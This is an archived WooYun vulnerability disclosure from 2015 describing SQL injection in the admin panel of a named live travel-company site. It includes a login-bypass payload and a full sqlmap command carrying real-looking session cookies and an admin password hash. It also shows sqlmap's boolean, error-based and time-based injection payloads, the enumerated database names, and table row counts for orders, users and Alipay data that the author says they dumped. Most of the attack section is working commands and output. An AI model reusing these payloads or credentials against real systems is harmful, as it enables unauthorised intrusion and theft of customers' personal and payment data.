乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-07: 细节已通知厂商并且等待厂商处理中 2015-09-12: 厂商已经主动忽略漏洞,细节向公众公开
1、乌云搜索了一下弱口令,看到了这个
WooYun: 开元旅行网后台弱口令导致订单泄露
就fuzz了一下子域名,查到了某后台2、
http://dhl.kaiyuan.eu/admin.php?action=login
1' or '1'='1
两处注入,一个get,一个post一、1、
sqlmap.py -u "http://dhl.kaiyuan.eu/admin.php?action=plus_center&plus=book_man&read=b.id&getnew=1&order_export=25830" --cookie "Hm_lvt_58db26aba9239de594be5994f13e63e3=1441508872,1441608262,1441614146,1441614165; __utma=246661406.1888963922.1441092792.1441608262.1441614147.6; __utmz=246661406.1441614147.6.3.utmcsr=wooyun.org|utmccn=(referral)|utmcmd=referral|utmcct=/corps/%E5%BE%B7%E5%9B%BD%E5%BC%80%E5%85%83; pgv_pvi=4010238976; __utma=96885962.2119707681.1441112523.1441165202.1441608507.3; __utmz=96885962.1441112523.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CNZZDATA2923558=cnzz_eid%3D345566589-1441112544-%26ntime%3D1441614173; Hm_lpvt_58db26aba9239de594be5994f13e63e3=1441614165; __utmc=246661406; pgv_si=s1992612864; PHPSESSID=vn2qhd08vo1m9mvr2nd50g9ur5; __jsluid=90192e1357656f0b01c452b014e6b349; cod=49.48.44.45.46.11.47.34.2128812174.2128812234.2128812382.2128812429; csd=2145015660; __utmc=96885962; IESESSION=alive; __utmb=246661406.2.10.1441614147; __utmt=1; lan=zh_CN; bianyou[suid]=10; bianyou[pass]=456c827fb612025052d0cf2e8a6f194e"
2、
Parameter: plus (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=plus_center&plus=book_man%' AND 6587=6587 AND '%'='&read=b.id&getnew=1&order_export=25830 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: action=plus_center&plus=book_man%' AND (SELECT 1400 FROM(SELECT COUNT(*),CONCAT(0x717a6a7171,(SELECT (ELT(1400=1400,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&read=b.id&getnew=1&order_export=25830 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: action=plus_center&plus=book_man%' AND SLEEP(5) AND '%'='&read=b.id&getnew=1&order_export=25830---back-end DBMS: MySQL 5.0
3、
available databases [11]:[*] chinesediapers[*] dhl[*] fitdiapers[*] fitsandstone[*] hi6go[*] information_schema[*] kytest[*] kytour[*] mysql[*] test[*] tour
4、就跑了一个裤子,其他没看。
Database: dhl+---------------------+---------+| Table | Entries |+---------------------+---------+| dhl_integral | 25476 || dhl_order_detail | 22628 || dhl_goods | 22499 || dhl_record | 22226 || dhl_order | 12105 || dhl_order_base | 11729 || dhl_order_bpost | 10277 || dhl_alipay_data | 7495 || dhl_user | 6506 |
二、添加链接处注入
危害等级:无影响厂商忽略
忽略时间:2015-09-12 17:16
漏洞Rank:4 (WooYun评价)
暂无